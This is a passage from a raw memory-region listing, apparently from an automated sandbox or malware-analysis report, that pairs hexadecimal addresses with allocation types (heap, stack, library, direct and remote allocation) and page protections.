heap
page read and write
271C0000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
242B0000
heap
page read and write
2449F000
trusted library allocation
page read and write
26803915000
heap
page read and write
26807188000
trusted library allocation
page read and write
244A5000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
4840000
trusted library allocation
page read and write
5AD000
heap
page read and write
2680588E000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
26805898000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
6EA0000
direct allocation
page read and write
26A10000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
2561F000
trusted library allocation
page read and write
A3717CA000
stack
page read and write
7FFD9B960000
trusted library allocation
page read and write
2446E000
trusted library allocation
page read and write
2549D000
trusted library allocation
page read and write
2F15000
trusted library allocation
page execute and read and write
26780000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
268059D5000
trusted library allocation
page read and write
4931000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
24C0F840000
heap
page read and write
24C117D3000
heap
page read and write
C70000
heap
page read and write
26805B5C000
trusted library allocation
page read and write
81F0000
heap
page read and write
A370C7B000
stack
page read and write
26530000
trusted library allocation
page read and write
6015000
remote allocation
page execute and read and write
253E7000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
24C0F859000
heap
page read and write
27110000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
252C1000
trusted library allocation
page read and write
24608000
trusted library allocation
page read and write
7444000
heap
page read and write
24324000
trusted library allocation
page read and write
4B0000
heap
page readonly
7638000
trusted library allocation
page read and write
26540000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
271F0000
trusted library allocation
page read and write
25516000
trusted library allocation
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
6EB0000
direct allocation
page read and write
264D0000
trusted library allocation
page read and write
D8D5000
direct allocation
page execute and read and write
7FFD9B762000
trusted library allocation
page read and write
1E0000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
24C117DB000
heap
page read and write
86EE000
stack
page read and write
26530000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
2556B000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
498B000
trusted library allocation
page read and write
24030000
remote allocation
page read and write
2700E000
stack
page read and write
7FFD9B980000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
2415A000
stack
page read and write
26530000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
27150000
trusted library allocation
page execute and read and write
7FFD9BA40000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26803890000
heap
page read and write
255C3000
trusted library allocation
page read and write
27250000
trusted library allocation
page read and write
24C0F84F000
heap
page read and write
C4D5000
direct allocation
page execute and read and write
265F0000
heap
page read and write
2681D883000
heap
page read and write
A37077E000
stack
page read and write
26805637000
trusted library allocation
page read and write
24360000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
268156FB000
trusted library allocation
page read and write
26540000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26805497000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
24C0F853000
heap
page read and write
264C0000
trusted library allocation
page read and write
6F2D000
stack
page read and write
5615000
remote allocation
page execute and read and write
26A10000
trusted library allocation
page read and write
24C117B2000
heap
page read and write
A37164E000
stack
page read and write
244B2000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26531000
trusted library allocation
page read and write
270CE000
stack
page read and write
26A10000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
264D0000
trusted library allocation
page read and write
2672F000
stack
page read and write
D8F000
stack
page read and write
27110000
trusted library allocation
page read and write
6E70000
direct allocation
page read and write
774B000
stack
page read and write
618000
heap
page read and write
26A00000
trusted library allocation
page read and write
76F0000
trusted library allocation
page read and write
24100000
heap
page execute and read and write
253ED000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
A3705FE000
stack
page read and write
70F8000
heap
page read and write
269F0000
trusted library allocation
page read and write
26807619000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
5D9000
heap
page read and write
2EB0000
trusted library section
page read and write
2F12000
trusted library allocation
page read and write
510000
direct allocation
page read and write
26A10000
trusted library allocation
page read and write
2F80000
heap
page readonly
2406E000
stack
page read and write
24C117FA000
heap
page read and write
C40000
direct allocation
page read and write
26805210000
trusted library allocation
page read and write
263EA000
heap
page read and write
2FB0000
heap
page read and write
2554D000
trusted library allocation
page read and write
7427000
heap
page read and write
26780000
trusted library allocation
page read and write
A5C000
stack
page read and write
24030000
remote allocation
page read and write
26530000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
253FD000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
24030000
remote allocation
page read and write
26A10000
trusted library allocation
page read and write
8610000
trusted library allocation
page read and write
24C0F980000
heap
page read and write
24C0F861000
heap
page read and write
271B0000
trusted library allocation
page read and write
271C0000
trusted library allocation
page read and write
268071AE000
trusted library allocation
page read and write
27140000
trusted library allocation
page read and write
26A1F000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
24C0F7E0000
heap
page read and write
26A10000
trusted library allocation
page read and write
8545000
trusted library allocation
page read and write
26805400000
heap
page read and write
26530000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
27140000
trusted library allocation
page read and write
6FAE000
stack
page read and write
2546D000
trusted library allocation
page read and write
7FFD9B942000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
491E000
stack
page read and write
25579000
trusted library allocation
page read and write
25604000
trusted library allocation
page read and write
244AD000
trusted library allocation
page read and write
76D0000
trusted library allocation
page read and write
BDE000
stack
page read and write
263CC000
heap
page read and write
26A10000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
1F4000
trusted library allocation
page read and write
27210000
trusted library allocation
page read and write
27140000
trusted library allocation
page read and write
61F000
heap
page read and write
24C0F876000
heap
page read and write
23EB0000
trusted library allocation
page read and write
84C0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
262C0000
trusted library allocation
page read and write
2551A000
trusted library allocation
page read and write
540000
direct allocation
page read and write
271C0000
trusted library allocation
page read and write
A370879000
stack
page read and write
26805E0A000
trusted library allocation
page read and write
24378000
trusted library allocation
page read and write
84B0000
trusted library allocation
page read and write
640000
heap
page read and write
24318000
trusted library allocation
page read and write
271C0000
trusted library allocation
page read and write
489E000
stack
page read and write
24476000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
A370A7E000
stack
page read and write
26530000
trusted library allocation
page read and write
A3708F6000
stack
page read and write
26474000
trusted library allocation
page read and write
B50000
heap
page read and write
527000
heap
page read and write
24C0F770000
heap
page read and write
25696000
trusted library allocation
page read and write
2538F000
trusted library allocation
page read and write
4C0000
heap
page read and write
26530000
trusted library allocation
page read and write
26482000
trusted library allocation
page read and write
24C0F7E1000
heap
page read and write
4090000
remote allocation
page execute and read and write
264B0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
264F0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
7DF481FC0000
trusted library allocation
page execute and read and write
27110000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
500000
direct allocation
page read and write
269F0000
trusted library allocation
page read and write
264D6000
trusted library allocation
page read and write
26360000
heap
page read and write
26805411000
trusted library allocation
page read and write
CED5000
direct allocation
page execute and read and write
7403000
heap
page read and write
82C7000
heap
page read and write
2447C000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
8870000
direct allocation
page read and write
26815411000
trusted library allocation
page read and write
271D0000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
2563E000
trusted library allocation
page read and write
2681D990000
heap
page read and write
24C0F820000
heap
page read and write
26774000
trusted library allocation
page read and write
27120000
trusted library allocation
page read and write
8100000
trusted library allocation
page read and write
6E6B000
stack
page read and write
26A10000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
D0F000
stack
page read and write
8810000
direct allocation
page read and write
81E0000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
2437C000
trusted library allocation
page read and write
4A87000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
24C0F834000
heap
page read and write
26A10000
trusted library allocation
page read and write
24C0F85C000
heap
page read and write
26803910000
heap
page read and write
24C0F81E000
heap
page read and write
269F0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
243A4000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
B5CBAFE000
stack
page read and write
264E0000
trusted library allocation
page read and write
253A3000
trusted library allocation
page read and write
24C0F815000
heap
page read and write
265F1000
heap
page read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
25349000
trusted library allocation
page read and write
A370B78000
stack
page read and write
2435C000
trusted library allocation
page read and write
27120000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
84C9000
trusted library allocation
page read and write
26805220000
heap
page readonly
27110000
trusted library allocation
page read and write
A3704FE000
stack
page read and write
26A10000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
24472000
trusted library allocation
page read and write
268058AB000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
A3716CE000
stack
page read and write
24C0F8AA000
heap
page read and write
7FFD9B764000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
24197000
stack
page read and write
27210000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
263E1000
heap
page read and write
26530000
trusted library allocation
page read and write
6D6F000
stack
page read and write
612000
heap
page read and write
721E000
stack
page read and write
24C117F2000
heap
page read and write
6EE0000
direct allocation
page read and write
2554F000
trusted library allocation
page read and write
2681DB65000
heap
page read and write
2681D7C8000
heap
page read and write
27200000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
24771000
trusted library allocation
page read and write
268039C5000
heap
page read and write
255D6000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
268039B1000
heap
page read and write
7FFD9B7BC000
trusted library allocation
page execute and read and write
26780000
trusted library allocation
page read and write
24440000
trusted library allocation
page read and write
26803945000
heap
page read and write
5D2000
heap
page read and write
264C0000
trusted library allocation
page read and write
24C117E6000
heap
page read and write
26530000
trusted library allocation
page read and write
26540000
trusted library allocation
page read and write
2EE4000
trusted library allocation
page read and write
2704E000
stack
page read and write
24C0F853000
heap
page read and write
24C0F7B0000
heap
page read and write
25352000
trusted library allocation
page read and write
7620000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26806323000
trusted library allocation
page read and write
24C117B2000
heap
page read and write
26530000
trusted library allocation
page read and write
2EE3000
trusted library allocation
page execute and read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
24C0F85F000
heap
page read and write
25547000
trusted library allocation
page read and write
268075FD000
trusted library allocation
page read and write
24C0F820000
heap
page read and write
264C0000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
2554B000
trusted library allocation
page read and write
2680752C000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
5E0000
heap
page read and write
76C0000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
2680396D000
heap
page read and write
269F0000
trusted library allocation
page read and write
2681DAA0000
heap
page read and write
264D0000
trusted library allocation
page read and write
D4E000
stack
page read and write
26530000
trusted library allocation
page read and write
27230000
trusted library allocation
page execute and read and write
823C000
heap
page read and write
26530000
trusted library allocation
page read and write
741B000
heap
page read and write
2432E000
trusted library allocation
page read and write
73E0000
heap
page read and write
5D9000
heap
page read and write
26530000
trusted library allocation
page read and write
24C0F883000
heap
page read and write
268052DF000
heap
page read and write
26530000
trusted library allocation
page read and write
24C0F8A1000
heap
page read and write
92D5000
direct allocation
page execute and read and write
26540000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
24C117CD000
heap
page read and write
26530000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
5E0000
heap
page read and write
253C7000
trusted library allocation
page read and write
5DD000
heap
page read and write
5D6000
heap
page read and write
25356000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
24C0F850000
heap
page read and write
271D0000
trusted library allocation
page read and write
24C117BE000
heap
page read and write
2F90000
trusted library allocation
page execute and read and write
25619000
trusted library allocation
page read and write
24C117BE000
heap
page read and write
26433000
heap
page read and write
24364000
trusted library allocation
page read and write
846E000
stack
page read and write
24C0F805000
heap
page read and write
269F0000
trusted library allocation
page read and write
26540000
trusted library allocation
page read and write
729E000
stack
page read and write
264D0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
2681D8D0000
heap
page execute and read and write
26A10000
trusted library allocation
page read and write
24C117E6000
heap
page read and write
265F1000
heap
page read and write
26530000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
8815000
remote allocation
page execute and read and write
269F0000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
264D0000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26805E65000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
7610000
trusted library allocation
page execute and read and write
27110000
trusted library allocation
page read and write
27210000
trusted library allocation
page read and write
2681571A000
trusted library allocation
page read and write
268059C0000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
271C0000
trusted library allocation
page read and write
2EED000
trusted library allocation
page execute and read and write
269F0000
trusted library allocation
page read and write
24C0F881000
heap
page read and write
271F0000
trusted library allocation
page read and write
BD0000
direct allocation
page read and write
4928000
heap
page read and write
A3707FE000
stack
page read and write
27240000
trusted library allocation
page read and write
479E000
stack
page read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
87E0000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26540000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
8293000
heap
page read and write
7FFD9B900000
trusted library allocation
page read and write
B55000
heap
page read and write
24C0F855000
heap
page read and write
81B0000
trusted library allocation
page execute and read and write
26A10000
trusted library allocation
page read and write
255D0000
trusted library allocation
page read and write
80F0000
trusted library allocation
page read and write
A37067C000
stack
page read and write
271F0000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
2638E000
heap
page read and write
B5CBEFF000
stack
page read and write
26530000
trusted library allocation
page read and write
24C0F8AA000
heap
page read and write
26530000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
24579000
trusted library allocation
page read and write
C50000
direct allocation
page read and write
26A10000
trusted library allocation
page read and write
24C0F827000
heap
page read and write
27140000
trusted library allocation
page read and write
26470000
trusted library allocation
page read and write
240C0000
direct allocation
page read and write
7650000
trusted library allocation
page read and write
9CD5000
direct allocation
page execute and read and write
253A9000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
2553F000
trusted library allocation
page read and write
25589000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
27140000
trusted library allocation
page read and write
80D7000
stack
page read and write
27140000
trusted library allocation
page read and write
2681DB44000
heap
page read and write
271F0000
trusted library allocation
page read and write
2425C000
stack
page read and write
253AB000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26770000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
264B0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
1FD000
trusted library allocation
page execute and read and write
23FCE000
stack
page read and write
26A10000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
26790000
trusted library allocation
page execute and read and write
243C9000
trusted library allocation
page read and write
6CEE000
stack
page read and write
24C117BE000
heap
page read and write
2421F000
stack
page read and write
26A00000
trusted library allocation
page execute and read and write
26A10000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
27210000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
2ED0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
24C117D6000
heap
page read and write
26530000
trusted library allocation
page read and write
271C0000
trusted library allocation
page read and write
6E2D000
stack
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
27210000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
73E9000
heap
page read and write
27210000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
24C117C0000
heap
page read and write
24C0F83B000
heap
page read and write
255C9000
trusted library allocation
page read and write
2D00000
heap
page read and write
752E000
stack
page read and write
26A10000
trusted library allocation
page read and write
264D0000
trusted library allocation
page read and write
8830000
direct allocation
page read and write
24368000
trusted library allocation
page read and write
2647E000
trusted library allocation
page read and write
26496000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
24C117B5000
heap
page read and write
756E000
stack
page read and write
27140000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
26540000
trusted library allocation
page read and write
264D0000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
8287000
heap
page read and write
A3706FF000
stack
page read and write
27200000
trusted library allocation
page read and write
61D000
heap
page read and write
26A10000
trusted library allocation
page read and write
26540000
trusted library allocation
page read and write
2544C000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
2681D970000
heap
page execute and read and write
26A10000
trusted library allocation
page read and write
5998000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
8890000
trusted library allocation
page execute and read and write
24C117B6000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
26803960000
heap
page read and write
26776000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
27210000
trusted library allocation
page read and write
27210000
trusted library allocation
page read and write
2436C000
trusted library allocation
page read and write
B5CBFFE000
stack
page read and write
27110000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
271D7000
trusted library allocation
page read and write
422000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
26411000
heap
page read and write
271F0000
trusted library allocation
page read and write
425000
trusted library allocation
page execute and read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
27110000
trusted library allocation
page execute and read and write
24C117B8000
heap
page read and write
26540000
trusted library allocation
page read and write
262C8000
trusted library allocation
page read and write
483E000
stack
page read and write
26530000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
23F8D000
stack
page read and write
72DE000
stack
page read and write
81C0000
heap
page read and write
27110000
trusted library allocation
page read and write
5C6000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
271C0000
trusted library allocation
page read and write
255F1000
trusted library allocation
page read and write
430000
trusted library allocation
page execute and read and write
24C117C8000
heap
page read and write
8220000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
2D6B000
heap
page read and write
26530000
trusted library allocation
page read and write
268071A0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
530000
direct allocation
page read and write
26460000
heap
page read and write
26531000
trusted library allocation
page read and write
26805260000
trusted library allocation
page read and write
25346000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
26770000
trusted library allocation
page read and write
2681DB5A000
heap
page read and write
26530000
trusted library allocation
page read and write
268058A2000
trusted library allocation
page read and write
4920000
heap
page read and write
61D000
heap
page read and write
7FFD9BB00000
trusted library allocation
page execute and read and write
26530000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
2680718D000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
268038F0000
heap
page read and write
84D0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
2681D7FC000
heap
page read and write
2CF4000
heap
page read and write
2642A000
heap
page read and write
828B000
heap
page read and write
26530000
trusted library allocation
page read and write
24C0F819000
heap
page read and write
2681D9B0000
heap
page read and write
27110000
trusted library allocation
page read and write
268075BB000
trusted library allocation
page read and write
2710E000
stack
page read and write
A370AFE000
stack
page read and write
814D000
stack
page read and write
4A0000
heap
page read and write
268038B0000
heap
page read and write
62F000
heap
page read and write
26A10000
trusted library allocation
page read and write
2567E000
trusted library allocation
page read and write
A9D000
stack
page read and write
27140000
trusted library allocation
page read and write
24C0F839000
heap
page read and write
24630000
trusted library allocation
page read and write
25404000
trusted library allocation
page read and write
268039EF000
heap
page read and write
269F0000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
2EF0000
trusted library allocation
page read and write
25464000
trusted library allocation
page read and write
24C0F85C000
heap
page read and write
269F0000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
2680597F000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
24C117EB000
heap
page read and write
2D5C000
heap
page read and write
527000
heap
page read and write
26530000
trusted library allocation
page read and write
42B000
trusted library allocation
page execute and read and write
26A10000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
271C0000
trusted library allocation
page read and write
6ED0000
direct allocation
page read and write
26530000
trusted library allocation
page read and write
269EE000
stack
page read and write
268037B0000
heap
page read and write
26A10000
trusted library allocation
page read and write
268039ED000
heap
page read and write
40D000
trusted library allocation
page execute and read and write
26A00000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
84AC000
stack
page read and write
8210000
heap
page read and write
26A10000
trusted library allocation
page read and write
5DE000
heap
page read and write
255F9000
trusted library allocation
page read and write
25541000
trusted library allocation
page read and write
2649D000
trusted library allocation
page read and write
25326000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
271E0000
trusted library allocation
page read and write
2552C000
trusted library allocation
page read and write
24C0F83D000
heap
page read and write
7FFD9B91A000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
76A0000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
2562F000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
27140000
trusted library allocation
page read and write
725E000
stack
page read and write
268039F4000
heap
page read and write
26A10000
trusted library allocation
page read and write
C10000
direct allocation
page read and write
271C0000
trusted library allocation
page read and write
27250000
trusted library allocation
page read and write
41A000
trusted library allocation
page execute and read and write
268039AD000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
24C0F876000
heap
page read and write
24474000
trusted library allocation
page read and write
9150000
direct allocation
page execute and read and write
271C0000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
26540000
trusted library allocation
page read and write
27120000
trusted library allocation
page execute and read and write
5959000
trusted library allocation
page read and write
27260000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
27210000
trusted library allocation
page read and write
2429E000
stack
page read and write
243C7000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
244DE000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
268075F8000
trusted library allocation
page read and write
24C117B4000
heap
page read and write
525000
heap
page read and write
25378000
trusted library allocation
page read and write
74E0000
heap
page execute and read and write
27220000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
24C0F823000
heap
page read and write
2FA0000
heap
page execute and read and write
269F0000
trusted library allocation
page read and write
254C1000
trusted library allocation
page read and write
24C0F81A000
heap
page read and write
75ED000
stack
page read and write
27210000
trusted library allocation
page read and write
56A000
heap
page read and write
27210000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
7415000
remote allocation
page execute and read and write
27110000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
87D0000
trusted library allocation
page execute and read and write
25372000
trusted library allocation
page read and write
2546F000
trusted library allocation
page read and write
B4E000
stack
page read and write
2465D000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
8840000
direct allocation
page read and write
26780000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
72F1000
heap
page read and write
6E90000
direct allocation
page read and write
24C118B6000
heap
page read and write
26A10000
trusted library allocation
page read and write
27130000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
24C117BA000
heap
page read and write
255EB000
trusted library allocation
page read and write
24C0F83C000
heap
page read and write
1F0000
trusted library allocation
page read and write
267A0000
heap
page execute and read and write
26530000
trusted library allocation
page read and write
2676E000
stack
page read and write
26530000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
26A10000
trusted library allocation
page read and write
2681D84C000
heap
page read and write
61D000
heap
page read and write
254A9000
trusted library allocation
page read and write
702D000
stack
page read and write
264D0000
trusted library allocation
page read and write
27140000
trusted library allocation
page read and write
410000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
A37174D000
stack
page read and write
252E9000
trusted library allocation
page read and write
271C0000
trusted library allocation
page read and write
872E000
stack
page read and write
24374000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
26540000
trusted library allocation
page read and write
24C0FA20000
heap
page read and write
240E0000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
87B0000
trusted library allocation
page read and write
B59000
heap
page read and write
6FEB000
stack
page read and write
7FFD9BA20000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
271E0000
trusted library allocation
page execute and read and write
24C117EF000
heap
page read and write
268071B2000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
770000
heap
page read and write
26A10000
trusted library allocation
page read and write
26540000
trusted library allocation
page read and write
2F7E000
stack
page read and write
2681D9B4000
heap
page read and write
26530000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
2450E000
trusted library allocation
page read and write
73F9000
heap
page read and write
8239000
heap
page read and write
24C0F805000
heap
page read and write
2642E000
heap
page read and write
7EF60000
trusted library allocation
page execute and read and write
25612000
trusted library allocation
page read and write
412000
trusted library allocation
page read and write
70E0000
heap
page read and write
271D0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
24C0F81B000
heap
page read and write
2647B000
trusted library allocation
page read and write
24C0F815000
heap
page read and write
26530000
trusted library allocation
page read and write
24110000
heap
page read and write
26A10000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
2468B000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
26A10000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
271C0000
trusted library allocation
page read and write
2681DAEE000
heap
page read and write
264D0000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
240F0000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
80E0000
trusted library allocation
page execute and read and write
26A10000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26806269000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
268058A7000
trusted library allocation
page read and write
84DE000
trusted library allocation
page read and write
24C117B1000
heap
page read and write
264D0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
24C0F827000
heap
page read and write
26530000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
24C0F897000
heap
page read and write
2F00000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
4C15000
remote allocation
page execute and read and write
706B000
stack
page read and write
BAD5000
direct allocation
page execute and read and write
2561D000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
2D67000
heap
page read and write
268059BC000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
7660000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
24C117BF000
heap
page read and write
26A10000
trusted library allocation
page read and write
59A1000
trusted library allocation
page read and write
8230000
heap
page read and write
25388000
trusted library allocation
page read and write
27130000
trusted library allocation
page execute and read and write
26540000
trusted library allocation
page read and write
25397000
trusted library allocation
page read and write
2677A000
trusted library allocation
page read and write
246B8000
trusted library allocation
page read and write
2E90000
heap
page read and write
24336000
trusted library allocation
page read and write
A3709FB000
stack
page read and write
26815420000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
268071FE000
trusted library allocation
page read and write
625000
heap
page read and write
240AF000
stack
page read and write
264E0000
